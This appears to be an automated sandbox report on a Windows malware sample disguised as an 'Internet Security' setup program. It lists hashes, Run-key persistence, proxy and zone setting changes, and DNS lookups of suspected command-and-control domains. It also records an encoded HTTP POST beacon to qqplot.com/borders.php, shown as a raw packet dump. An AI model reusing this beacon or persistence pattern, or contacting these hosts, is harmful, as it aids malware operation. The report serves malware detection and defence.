Analysis Date2014-09-09 22:26:07
MD50d145644710911d5af59d8bdc56914da
SHA1a21843f6b2ad6e5610114326ce90580da47b7c40

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: 3eaa392daacecedd37f79f509b295d64 sha1: 442d802f677e4dda95fb074f400ecec4e2c35d0d size: 17408
Section.rdata md5: ebcd0bb065341babf821452914598e68 sha1: fc96f1f4029f011192c302bc25b1b4d5fe782f99 size: 2560
Section.data md5: d4307ae1a84deaee96196c69d55a1518 sha1: 99cc116a87629d4fde50cb852dba72a186d41349 size: 111104
Section.rsrc md5: cc5fcaef8c7d7d4925bcc8daa010e070 sha1: 279152c9f0d8d4317c65135e824492d418162690 size: 5120
Timestamp2009-06-16 03:46:17
VersionLegalCopyright: Copyright © 2010 Setup Technologies Gz
InternalName: Sa set_up w
FileVersion: 4.1.0.0
CompanyName: Jordan Russell
LegalTrademarks:
Comments:
ProductName: WW Internet Security 8
ProductVersion: 4.1.0.0
FileDescription: R8 Setup Self-Extractor 0T
OriginalFilename: Sa set_up w
PackerBorland Delphi 4.0
PEhash92a0d0f5f24a3342c302860d08ee0c19cddabda1
IMPhash30e41d76dd3e6950a9eadd3ecb3dfd62

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Creates ProcessC:\malware.exe
Creates MutexGlobal\{F5CC5A0A-B9E5-411f-BF7E-EACE3BBC2BF1}
Creates Mutex{A14B1A1D-023F-40dc-BBFE-208B1DAD2F82}

Process
↳ C:\malware.exe

RegistryHKEY_CURRENT_USER\Software\CY08W456F0\OteH ➝
xC7aKZ+O6wyPlq1krRM4sG7m2LFGsYtHjHOagBf10Uk/n4gL8s8xs9LeD5KQVh3/j+XFa0mnr175UElKKyciA2gn6tUEA721Fj4P\\x00
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\CY08W456F0 ➝
C:\malware.exe
RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
NULL
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\\\x03\1601 ➝
NULL
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝
1
Creates FileC:\WINDOWS\Tasks\{22116563-108C-42c0-A7CE-60161B75E508}.job
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Cookies\index.dat
Creates FilePIPE\lsarpc
Creates File\Device\Afd\Endpoint
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates Mutexc:!documents and settings!administrator!local settings!history!history.ie5!
Creates MutexGlobal\{F5CC5A0A-B9E5-411f-BF7E-EACE3BBC2BF1}
Creates MutexWininetConnectionMutex
Creates Mutexc:!documents and settings!administrator!cookies!
Creates Mutexc:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Creates Mutex{A14B1A1D-023F-40dc-BBFE-208B1DAD2F82}
Winsock DNSlacvictoria.com
Winsock DNSqqplot.com

Network Details:

DNSwsj.com
Type: A
205.203.140.65
DNSwsj.com
Type: A
205.203.132.1
DNSwsj.com
Type: A
205.203.132.65
DNSwsj.com
Type: A
205.203.140.1
DNSfastclick.com
Type: A
64.156.167.84
DNSnifty.com
Type: A
210.131.4.217
DNSqqplot.com
Type: A
109.74.195.149
DNSlacvictoria.com
Type: A
DNSpaulo-fg.com
Type: A
DNSbonreligion.com
Type: A
HTTP POSThttp://qqplot.com/borders.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Flows TCP192.168.1.1:1031 ➝ 109.74.195.149:80

Raw Pcap
0x00000000 (00000)   504f5354 202f626f 72646572 732e7068   POST /borders.ph
0x00000010 (00016)   70204854 54502f31 2e310d0a 41636365   p HTTP/1.1..Acce
0x00000020 (00032)   70743a20 2a2f2a0d 0a436f6e 74656e74   pt: */*..Content
0x00000030 (00048)   2d547970 653a2061 70706c69 63617469   -Type: applicati
0x00000040 (00064)   6f6e2f78 2d777777 2d666f72 6d2d7572   on/x-www-form-ur
0x00000050 (00080)   6c656e63 6f646564 0d0a5573 65722d41   lencoded..User-A
0x00000060 (00096)   67656e74 3a204d6f 7a696c6c 612f342e   gent: Mozilla/4.
0x00000070 (00112)   30202863 6f6d7061 7469626c 653b204d   0 (compatible; M
0x00000080 (00128)   53494520 362e303b 2057696e 646f7773   SIE 6.0; Windows
0x00000090 (00144)   204e5420 352e3029 0d0a486f 73743a20    NT 5.0)..Host: 
0x000000a0 (00160)   7171706c 6f742e63 6f6d0d0a 436f6e74   qqplot.com..Cont
0x000000b0 (00176)   656e742d 4c656e67 74683a20 3334310d   ent-Length: 341.
0x000000c0 (00192)   0a436f6e 6e656374 696f6e3a 204b6565   .Connection: Kee
0x000000d0 (00208)   702d416c 6976650d 0a436163 68652d43   p-Alive..Cache-C
0x000000e0 (00224)   6f6e7472 6f6c3a20 6e6f2d63 61636865   ontrol: no-cache
0x000000f0 (00240)   0d0a0d0a 64617461 3d2f436a 45665a44   ....data=/CjEfZD
0x00000100 (00256)   53767871 43694b30 6c74554d 31757932   SvxqCiK0ltUM1uy2
0x00000110 (00272)   2f797534 55355970 4e6d3176 2f2f6a54   /yu4U5YpNm1v//jT
0x00000120 (00288)   6e675663 2b774d73 2b2b5a42 6a375a53   ngVc+wMs++ZBj7ZS
0x00000130 (00304)   59547233 69426b47 2f672b37 5643432f   YTr3iBkG/g+7VCC/
0x00000140 (00320)   31396b66 694f4870 37655263 48506959   19kfiOHp7eRcHPiY
0x00000150 (00336)   6f393949 4d55756a 67555734 62765449   o99IMUujgUW4bvTI
0x00000160 (00352)   644e2f6a 50587547 506a6142 7a786c63   dN/jPXuGPjaBzxlc
0x00000170 (00368)   63356d70 4e303161 36742f51 69535858   c5mpN01a6t/QiSXX
0x00000180 (00384)   77707a39 486d306b 7a396642 6661556e   wpz9Hm0kz9fBfaUn
0x00000190 (00400)   3130782f 474c636f 66526948 344c7646   10x/GLcofRiH4LvF
0x000001a0 (00416)   73416947 59467361 696f4d57 30374b30   sAiGYFsaioMW07K0
0x000001b0 (00432)   4533726b 6b334d65 5a557967 44654c47   E3rkk3MeZUygDeLG
0x000001c0 (00448)   77327331 322b6f50 4d4e726e 4a5a637a   w2s12+oPMNrnJZcz
0x000001d0 (00464)   687a5a38 78694e57 75355467 4f687134   hzZ8xiNWu5TgOhq4
0x000001e0 (00480)   4f715553 30424d54 644b3262 5a792f68   OqUS0BMTdK2bZy/h
0x000001f0 (00496)   7833546e 6d477954 464c4868 4c635266   x3TnmGyTFLHhLcRf
0x00000200 (00512)   2b76417a 494f424e 6d763433 43444b32   +vAzIOBNmv43CDK2
0x00000210 (00528)   51303541 56636d41 38324b68 54665573   Q05AVcmA82KhTfUs
0x00000220 (00544)   732f476f 6c77786c 6d396b4c 6e726e6c   s/Golwxlm9kLnrnl
0x00000230 (00560)   492b3555 366e3336 642f3334 6b6f6c56   I+5U6n36d/34kolV
0x00000240 (00576)   31614b51 6e2b513d 3d                  1aKQn+Q==


Strings
9....
.
"
..
.
.
R..YV
040904E4
 2010  Setup Technologies Gz
4.1.0.0
BBABORT
Cannot open file "%s". %s
Comments
CompanyName
Copyright 
DVCLAL
Error reading %s%s%s: %s
Failed to get data for '%s'
FileDescription
FileVersion
InternalName
Invalid argument to date encode
Invalid argument to time encode
Invalid data type for '%s' List capacity out of bounds (%d)
Invalid property element: %s
Invalid property path
Invalid property type: %s
Invalid property value
Invalid stream format$''%s'' is not a valid component name
Jordan Russell
LegalCopyright
LegalTrademarks
List count out of bounds (%d)
List index out of bounds (%d)+Out of memory while expanding memory stream
MS Sans Serif
n5b5S
OLE error %.8x.Method '%s' not supported by automation object/Variant does not reference an automation object7Dispatch methods do not support more than 64 parameters!'%s' is not a valid integer value('%s' is not a valid floating point value
OriginalFilename
Out of memory
ProductName
ProductVersion
Property is read-only
Property %s does not exist
pRSE
R8 Setup Self-Extractor 0T
rE4r
Resource %s not found
Sa set_up w
%s.Seek not implemented$Operation not allowed on sorted list$%s not in a class registration group
Stream read error
Stream write error
StringFileInfo
TEXTFILEDLG
Translation
VarFileInfo
VS_VERSION_INFO
WW Internet Security 8
) =+ %
07K*,|
	0>B}Kp
0_/fo)
0lC8p@!
1	'2@f
136cuoHL
14:6265;]
?/1e$b
(\1ehn"t
1nhFi1
'1PGLQ
2c$]AX
2X(|(P
33333333?333333
333333333333333333
3333333333333338
3333339
333338
33333833
333838
3zX2$C:pKH
40IOi'on$s
;\4~D1
4#DEP`
4	g*uF
4kwX O/r
4	QNCE
4sT}Ej
&4@Us?
5d_v cC
5Ey-> Z
5Ono5PiZh
66roaA
6J6WuD
6$O9JX
7c(05C
7JOkjZ
7k"o*Y
81B ^:aE
=8( 529
8#@EHL
(#8EHT
8FVkpD
8#LE\l
%8n(<Ye`n"X
8#OA1P
.8[.>OJ
	8`Pd01s
8W@G[4
;9aVGr
9st2KP
A0_N6?Yh
A4J1"`xH
Adz{ps
/:aH0G
AHjLG]Z
andLui
A{`QGd
AQP]SR
<a$vO(
ayO)!cj
B1ExOy
B"2e v
B3/h{8bu4
b5Q#%$
B!"EC>
BEIuPuD
bPt$#0$
BQAsN8
CP$60e
)Cp y-
.c"q|m#
@ Csh j
C^$,V+
CVz_'k
%|d1:V
 D3x#:
d$(?A1
@.data
DeleteFileA
dI#PW&|
(\dL<[
dRigUzhm
*dS";L_@
*dS#;L
Dw$xtCf
dx	"^O7p
e<<$@.
}eCqf}
] e&DS
\	edsl%
E`;F\}3
ehw'	(
=Em#$D
EnumCalendarInfoA
ESNs1s
eT0@Kr
Ff=]Iy
FindClose
FindFirstFileA
F+ j[\
FOGYF9]
_frJ\E0
F%x8O,
G017Ujx15
,G	=5LI
|g6,( 
G;,B;hAH`
(:G ,E
GetMenu
GetWindowLongA
GetWindowLongW
GetWindowPlacement
GetWindowRect
Ggc%V\
.G]#gr,e
GwYpd$t
$:= h;
h6XD)P@
H+ 8P<
H~9D	=
#H/!<(D
hD+2Adq7
=HDuaF
Hj(o$)o
?Hn:v.
Ho(BX8]
#[ H*PQ
HPSPQ=
hS1=pH
H#TE\h
#hTP)!
HWWgjTd
i6s!-3d
iBy[T=oW:d
IC[)r 
IEGmXrp
I^h(IF
ij.E:u
}i'N`	P
iPr8Zf
Is#hLWr
-i%#vc
I&--[w
I$XO$E`
JD^g`3
, (jg%
Jqj,UW
J>tI,F
Kd	dm3!u
KERNEL32.dll
K	eTs]8f
kNueh8
l9 n(k
Lc)5o91LOLE
lcnYYxNGEDvYJn@12
|lfI!SH&LWC@
-lHwRy
^l&"jTd
L; LpL
LoadLibraryA
LocalAlloc
.lp^Q[
lr	+lv
%ls~.p(
lzSJ^Fp$^
&`M(>c
Mi/@1o
mNL	ZQ
 :  N1}
n9}Hr]
n E0Mf
n]H\p?
n"K,02
NuX`2J*
nX%ha`
nYdI	9
nY`ItY
^;O6Q2
_o_AAP0U@16
oc)mi][
_OCx-F
P1Dmof
,_P|?B
@#PEh|
PIGODe@24
-_?P+Ly/
p@	"	p
pPawh 
pRI->	-T
pVM79+
P#XE`d
QbfqoS
QMEuDyZTlg
Q.t8ex
QU9_D|?
q[[x3tR)
qxl0sg
qz/5#$
=$R$+/
%[*!R^
	r(1S$q 
'r3C:O ?
`.rdat
`.rdata
,R=DQM
RIGzrt
$Rj9@U4
!'R#LIWn~
ro(PYd8j)(dY
R%,]#!pzE
rQIder
R*(S;'P
 ]RT.6
RU.(:S
R]Y(T1e
<RzPSSm
RZy f>
S]4$`0[.e2
Sa set_up w
sc!pD$
se	# 4
_SfaPIK@4
Sfe[sJ
shlwapi
S-JAWu
#S_L(vE5
?sNY}Q
}/spBW
ST0MX}r
sXfMNN
T)=3iM<!
!T4K8"JX5
t;8;o`
t{99pv
tB<Zd0
}Tch"|;c
td	&:C
tDW"De]8
TE\#d#
tEL: LN1}
t%`h!.
This program must be run under Win32
tPHuJ1
TSQiKw87LsIcm3
,*tTTD
	/t}}u=Oy
U2mAh"C
u6)9Ex#
u?9|0\;"
u(Cc2\
u	dO3YX
!UNIQSTR
USER32.dll
uS!/x1h
uZs*?eO
v4NXRz
VC?Afs
VDb!"#/
vE$EPt
VH$)dK
VirtualAlloc
V`Jp/(}4
VL:4"Y8%
vN(1{e
v+P1jR:
;<]$	.vV
w,_2'9
$w2PJ8
W!3SX"#YA Z
&w5MiDv$
^W7SVC
wC5%Vz@
W \I -
W~I!SR
W*iz	F
X#`El|
_XEVOSL@20
x\Ez0|
<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity version="1.0.0.0" processorArchitecture="X86" name="Nullsoft.NSIS.exehead" type="win32"/><description>Nullsoft Install System v2.46</description><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="X86" publicKeyToken="6595b64144ccf1df" language="*" /></dependentAssembly></dependency><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="requireAdministrator" uiAccess="false"/></requestedPrivileges></security></trustInfo><compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"><application><supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/><supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/></application></compatibility></assembly>
xUBsxM
!,Y_*,
Yjr0Q@4
yQIaZA\
)ySxW,
YxzwbR
<(Yz96
Z&D_=CM
z^g#fS
,z.,qVp
ZVJyWX